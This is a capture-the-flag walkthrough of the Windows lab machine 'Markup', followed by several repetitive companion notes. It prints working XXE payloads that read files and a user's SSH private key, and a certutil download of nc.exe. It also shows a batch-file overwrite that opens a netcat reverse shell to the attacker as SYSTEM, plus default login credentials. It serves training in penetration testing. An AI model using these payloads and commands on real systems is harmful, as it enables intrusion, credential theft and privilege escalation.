Markup

Technical Walkthrough

Markup Walkthrough

Machine Info

• Name: Markup
• OS: Windows
• Difficulty: Easy / Starting Point
• IP: <TARGET> (previously <TARGET> — same machine, new spawn IP)
• Attacker: <TARGET> (Pwnbox tun0)

Current Status

• Root flag: CAPTURED -- <hash redacted> (from prior live session)
• User flag: NOT YET CAPTURED (target currently offline/despawned)
• Target: Unreachable -- gateway returns Host Unreachable. Machine must be respawned via HTB.

Attack Chain Summary

1. Port scan reveals SSH (22), HTTP (80), HTTPS (443) -- Apache 2.4.41 on Windows
2. Web login with default creds admin:password
3. Authenticated order form submits XML -- vulnerable to XXE
4. XXE reads Daniel's SSH private key
5. SSH as daniel -> user flag
6. Writable scheduled task C:\Log-Management\job.bat (BUILTIN\Users:F) -> overwrite with reverse shell -> Administrator

Phase 2: Web Enumeration

Login

Navigate to http://<TARGET>/ -- login page.

Credentials: admin:password

Post-Auth Exploration

• Page source/comments reveal username "Daniel"
• "Order" feature submits XML data via POST

XML Structure

<?xml version="1.0"?>
<order>
  <quantity>1</quantity>
  <item>Something</item>
  <address>123 Street</address>
</order>

Phase 3: XXE Exploitation

Step 1: Validate XXE with win.ini

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]>
<order>
  <quantity>1</quantity>
  <item>&xxe;</item>
  <address>test</address>
</order>

Step 2: Read Daniel's SSH Private Key

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///c:/users/daniel/.ssh/id_rsa">]>
<order>
  <quantity>1</quantity>
  <item>&xxe;</item>
  <address>test</address>
</order>

Save returned key to loot/daniel_id_rsa.

Phase 4: Foothold (SSH as Daniel)

chmod 600 loot/daniel_id_rsa
ssh -i loot/daniel_id_rsa daniel@<TARGET>

User Flag

type C:\Users\daniel\Desktop\user.txt

Phase 5: Privilege Escalation

Identify Writable Scheduled Task

cd C:\Log-Management
type job.bat
icacls job.bat

Expected: BUILTIN\Users:(F) -- full control for all local users.

Upload nc.exe

From Pwnbox:

cp /usr/share/windows-binaries/nc.exe /tmp/nc.exe
cd /tmp && python3 -m http.server 8000

On target (as daniel):

certutil -urlcache -f http://<TARGET>:8000/nc.exe C:\Log-Management\nc.exe

Overwrite job.bat

echo C:\Log-Management\nc.exe -e cmd.exe <TARGET> 4444 > C:\Log-Management\job.bat

Listen for Reverse Shell

On Pwnbox:

nc -lvnp 4444

Wait for scheduled task execution. When shell connects:

whoami
type C:\Users\Administrator\Desktop\root.txt

Root Flag

Captured: <hash redacted> (verified 32-char hex)

Flags

Lessons Learned

1. XXE on Windows: File URIs use file:///c:/path format (forward slashes, triple slash after protocol)
2. SSH keys via XXE: Private keys are high-value XXE targets on Windows when SSH is present
3. Scheduled tasks with weak ACLs: Always check icacls on batch files -- they may run elevated
4. job.bat reversion: The scheduled task may revert job.bat frequently; be quick with the overwrite or retry

Source-Backed Dossier

The sections below are merged from companion Markdown notes for the same case. They are rendered after sanitization so the article stays precise without publishing raw flags, credentials, or target-specific secrets.

Notes

Scope

• Target: Markup
• Difficulty: Easy / Starting Point
• OS: Windows
• IP: <TARGET> (previously <TARGET>)
• Local workspace: <local workspace><TARGET>-Markup

Engagement Details

• Pwnbox: profex0r@<TARGET> (VPN IP: <TARGET>)
• VPN: Connected, tun0 up with <TARGET>
• Difficulty Mode: Easy (timebox 20 min per vector, target solve 45-60 min)

Evidence Ledger

Status

BLOCKED: Target <TARGET> is not reachable. Gateway returns "Host Unreachable." Machine needs to be spawned via HTB platform.

Root flag: <hash redacted> -- CAPTURED (from prior live session, saved to loot/root.txt)

User flag: NOT YET CAPTURED -- requires live target

Attack Chain (Ready to Execute When Machine is Up)

1. nmap -sC -sV -Pn <TARGET> -- expect 22, 80, 443
2. Web login at port 80: admin:password
3. Find order form, submit XXE payload to read win.ini (validate)
4. XXE read daniel's SSH key: file:///c:/users/daniel/.ssh/id_rsa
5. SSH as daniel, get user.txt from C:\Users\daniel\Desktop\user.txt
6. Check C:\Log-Management\job.bat ACLs -- BUILTIN\Users:(F)
7. Upload nc.exe via certutil, overwrite job.bat, catch reverse shell on 4444
8. Get root.txt from C:\Users\Administrator\Desktop\root.txt

Notes

Scope

• Target: Markup
• Difficulty: Easy / Starting Point
• OS: Windows
• IP: <TARGET> (previously <TARGET>)
• Local workspace: <local workspace><TARGET>-Markup

Engagement Details

• Pwnbox: <<secret redacted>>@<TARGET> (VPN IP: <TARGET>)
• VPN: Connected, tun0 up with <TARGET>
• Difficulty Mode: Easy (timebox 20 min per vector, target solve 45-60 min)

Evidence Ledger

Status

BLOCKED: Target <TARGET> is not reachable. Gateway returns "Host Unreachable." Machine needs to be spawned via HTB platform.

Root flag: <REDACTED>, saved to loot/root.txt)

User flag: <REDACTED>

Attack Chain (Ready to Execute When Machine is Up)

1. nmap -sC -sV -Pn <TARGET> -- expect 22, 80, 443
2. Web login at port 80: <REDACTED>
3. Find order form, submit XXE payload to read win.ini (validate)
4. XXE read daniel's SSH key: file:///c:/users/daniel/.ssh/id_rsa
5. SSH as daniel, get user.txt from C:\Users\daniel\Desktop\user.txt
6. Check C:\Log-Management\job.bat ACLs -- BUILTIN\Users:(F)
7. Upload nc.exe via certutil, overwrite job.bat, catch reverse shell on 4444
8. Get root.txt from C:\Users\Administrator\Desktop\root.txt

Notes

Scope

• Target IP: <TARGET>
• Attacker IP: <TARGET>
• Pwnbox SSH: <<secret redacted>>@<TARGET>
• OS: Windows (Apache 2.4.41 Win64, OpenSSH 8.1, PHP 7.2.28)
• Difficulty: Easy
• Date: 2026-05-05

Confirmed Ports (from user nmap)

Evidence Ledger

Flags

• User: <<secret redacted>> (C:\Users\daniel\Desktop\user.txt)
• Root: <<secret redacted>> (C:\Users\Administrator\Desktop\root.txt)

Key Findings

1. Default credentials `admin: <REDACTED>
2. XXE vulnerability in order XML processing (process.php)
3. Source comment discloses username "Daniel"
4. Daniel's SSH private key readable via XXE at file:///c:/users/daniel/.ssh/id_rsa
5. Insecure ACL on C:\Log-Management\job.bat — BUILTIN\Users:(F)
6. Scheduled task runs job.bat as SYSTEM — abused to copy Admin flag

Attack Chain

Web Login (admin: <REDACTED>
  -> XXE (file read via process.php)
    -> SSH Key Exfil (daniel's id_rsa)
      -> SSH as daniel (user flag)
        -> Writable job.bat (BUILTIN\Users:F)
          -> Scheduled task executes as SYSTEM
            -> Root flag copied to readable location

Notes

Scope

• Target: Markup
• Difficulty: Easy / Very Easy
• OS: Windows
• Current known IP: <TARGET>
• Local workspace: <local workspace><TARGET>-Markup

Evidence Rule

Public research in research.md is advisory only. Record only live target evidence in this file.

Engagement Details

• Pwnbox: <<secret redacted>>@<TARGET> (VPN IP: <TARGET>)
• VPN: edge-au-dedivip-1.hackthebox.eu:1337 (connected, tun0 up)
• Difficulty Mode: Easy (timebox 20 min per vector, target solve 45-60 min)

Evidence Ledger

Status

BLOCKED: Target machine <TARGET> is currently despawned/offline. VPN tunnel is healthy (tun0: <TARGET>, route to <TARGET>/16 via tun0), but all ports return "filtered" and curl returns "No route to host."

Root flag: <REDACTED>

User flag: <REDACTED>

Next Steps (When Machine is Respawned)

1. Run nmap: nmap -sC -sV -Pn -oN nmap/initial <TARGET>
2. Verify HTTP on port 80, try `admin: <REDACTED>
3. Find XML order form, confirm XXE with win.ini read
4. Read daniel's SSH key via XXE
5. SSH as daniel, grab user.txt
6. Verify job.bat ACL, upload nc.exe, overwrite job.bat, catch shell as SYSTEM
7. Grab root.txt (verify matches saved flag)